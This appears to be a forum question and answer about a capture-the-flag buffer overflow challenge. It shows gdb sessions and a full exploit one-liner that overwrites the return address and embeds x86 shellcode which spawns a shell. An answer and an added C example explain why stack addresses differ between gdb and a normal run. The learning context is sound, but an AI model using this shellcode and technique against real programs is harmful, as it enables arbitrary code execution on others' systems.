C Simple Buffer Overflow


I'm trying to learn how buffer overflows work and how this can be used. I'm solving a simple challenge (backdoorlabs echo challenge) by trying to exploit a supplied binary file.

(see: http://hack.bckdr.in/ECHO/echo)

I think I'm doing everything right (according to the guides and tutorials I have been reading), but still it is not working, and it has been driving me crazy for hours now already.

The buffer overflow lets me overwrite the next instruction (eip).

(gdb) run <<< $(python -c 'print "A"*62+"BBBB"')    

The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"BBBB"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)

So I'm able to overwrite eip; now let's add 21 bytes of shellcode which spawns a shell and try to find the address where it is.

(gdb) run <<< $(python -c 'print "A"*62+"BBBB"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"BBBB"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB1▒▒▒Qh//shh/bin▒▒
         ̀

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/100x $sp
0xbffff750:     0xe1f7c931      0x2f2f6851      0x2f686873      0x896e6962
0xbffff760:     0xcd0bb0e3      0xbfff0080      0xbffff80c      0xb7fff3d0
0xbffff770:     0x08048480      0xffffffff      0x0012efc4      0x080482d8
0xbffff780:     0x00000001      0xbffff7c0      0x0011eb25      0x0012fab0

Bingo, the shellcode is right here, loaded at 0xbffff750, so that is the address we want to point eip to.

Until now everything looks right to me so I try it with the right values found.

(gdb) run <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP▒▒▒1▒▒▒Qh//shh/bin▒▒
         ̀

Program received signal SIGSEGV, Segmentation fault.
0xbffff750 in ?? ()
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.192.el6.i686
(gdb)


(gdb) x/i $eip
=> 0xbffff750:  xor    %ecx,%ecx
(gdb)

The eip got changed to the right address and the shellcode is in place; however, when I try it in my shell it does not work and still segfaults, as you can see.

[rick@TESTBOX tmp]$ ./vul <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP▒▒▒1▒▒▒Qh//shh/bin▒▒
         ̀
Segmentation fault
[rick@TESTBOX tmp]$

Does anyone here have some thoughts about this, see an error, or have any other ideas? As mentioned, I'm a newbie trying to understand the basic principles, and obviously I'm doing something wrong.

Best answer:

I think your problem is:

there is a difference between the real execution of a program and the gdb-controlled one.

You need to

  1. predict this difference. This question gives an example of how to do it.

OR

  2. I also faced your problem months ago. At that time, I observed this difference, but I did not use this way to find the difference; instead, I used the brute-force way shown in The Art of Exploitation 0x331: try different offsets with a shell script.

This question might help you in the future; it tells you how to turn off some security functions to allow you to attack.
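The answer's point, illustrated with an added example that is not part of the question or the answer: the strings the kernel copies to the top of a new process's stack differ between a gdb launch (`/tmp/vul`, plus the LINES and COLUMNS variables gdb exports to the inferior) and a shell launch (`./vul`), so every frame below them, including the one holding the buffer, lands at a different address and the value read in the debugger no longer holds. The argv/envp arrays are constructed for the comparison; stack ASLR, which the fixed 0xbffff... addresses above suggest was off on this box, is the mitigation that makes any hardcoded stack address unreliable.

```c
#include <stdio.h>
#include <string.h>

/* Bytes the kernel copies to the top of a new process's stack for the
 * argv and envp strings (each string plus its NUL terminator). Every
 * frame the program pushes later, including the one holding the
 * overflowed buffer, sits below this block, so changing it moves the
 * buffer's address. */
size_t launch_string_bytes(char *const argv[], char *const envp[]) {
    size_t total = 0;
    for (size_t i = 0; argv[i] != NULL; i++)
        total += strlen(argv[i]) + 1;
    for (size_t i = 0; envp[i] != NULL; i++)
        total += strlen(envp[i]) + 1;
    return total;
}

/* How many bytes higher (positive) or lower (negative) launch B's frames
 * land compared with launch A, counting the string block only. The real
 * shift also involves the auxiliary vector and stack alignment, and with
 * stack ASLR enabled the base moves on every run regardless. */
long launch_shift(char *const argvA[], char *const envpA[],
                  char *const argvB[], char *const envpB[]) {
    return (long)launch_string_bytes(argvA, envpA)
         - (long)launch_string_bytes(argvB, envpB);
}

int main(int argc, char **argv, char **envp) {
    /* Constructed launches: gdb runs the full path and exports LINES and
     * COLUMNS; the shell runs ./vul with only the inherited environment. */
    char *const gdb_argv[] = {"/tmp/vul", NULL};
    char *const gdb_envp[] = {"LINES=24", "COLUMNS=80", "PATH=/usr/bin", NULL};
    char *const sh_argv[]  = {"./vul", NULL};
    char *const sh_envp[]  = {"PATH=/usr/bin", NULL};
    char probe[64];             /* stands in for the overflowed buffer */

    (void)argc;
    printf("this process: %zu string bytes above the frames, buffer at %p\n",
           launch_string_bytes(argv, envp), (void *)probe);
    printf("shell launch frames sit %ld bytes higher than under gdb\n",
           launch_shift(gdb_argv, gdb_envp, sh_argv, sh_envp));
    return 0;
}
```

Run the compiled binary once directly and once under gdb and compare the printed buffer address; the difference is the effect the answer describes.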